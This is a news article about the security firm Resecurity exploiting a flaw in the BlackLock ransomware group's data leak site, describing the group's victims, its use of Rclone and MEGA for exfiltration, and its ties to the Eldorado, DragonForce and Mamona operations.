In a bold move that can be considered a case of hackers turning the tables on other hackers, cybersecurity experts have successfully breached the online infrastructure of a ransomware group known as BlackLock, shedding light on their tactics and operations. The cybersecurity firm Resecurity discovered a security vulnerability in the data leak site (DLS) associated with BlackLock, allowing them to extract critical information such as configuration files, credentials, and a history of commands executed on the server.
The flaw in the Data Leak Site (DLS) of BlackLock ransomware exposed clearnet IP addresses linked to their network infrastructure behind TOR hidden services, along with additional service details. According to Resecurity, the obtained history of commands represents a significant operational security failure on the part of BlackLock ransomware.
BlackLock ransomware, which is essentially a rebranded version of the Eldorado ransomware group, has emerged as one of the most active extortion syndicates in 2025. The group has been particularly targeting organizations in sectors such as technology, manufacturing, construction, finance, and retail, listing a total of 46 victims on its site last month. The victims hail from various countries including Argentina, Brazil, Canada, France, Italy, the United States, and more.
The cybersecurity experts also discovered that the hackers behind BlackLock had been using a technique called Rclone to exfiltrate data to the MEGA cloud storage service, sometimes even installing the MEGA client on victim systems. Additionally, the threat actors had created multiple accounts on MEGA using disposable email addresses generated via YOPmail to store victim data.
Furthermore, a closer examination of the ransomware’s source code and ransom notes revealed similarities with another ransomware strain named DragonForce, which had previously targeted organizations in Saudi Arabia. Interestingly, one of the main operators of BlackLock had launched a brief ransomware project called Mamona in March 2025.
In a surprising turn of events, the Data Leak Site of BlackLock was defaced by DragonForce, possibly through the exploitation of the same security vulnerability, leading to the exposure of configuration files and internal chats. Resecurity suggested that BlackLock might have either collaborated with DragonForce or transitioned under new ownership in response to the incidents.
Overall, the breach of BlackLock’s infrastructure sheds light on the inner workings of this ransomware group and highlights the ongoing battle between cybersecurity experts and malicious actors in the digital realm. This incident underscores the importance of proactive threat intelligence and cybersecurity measures to protect against evolving cyber threats.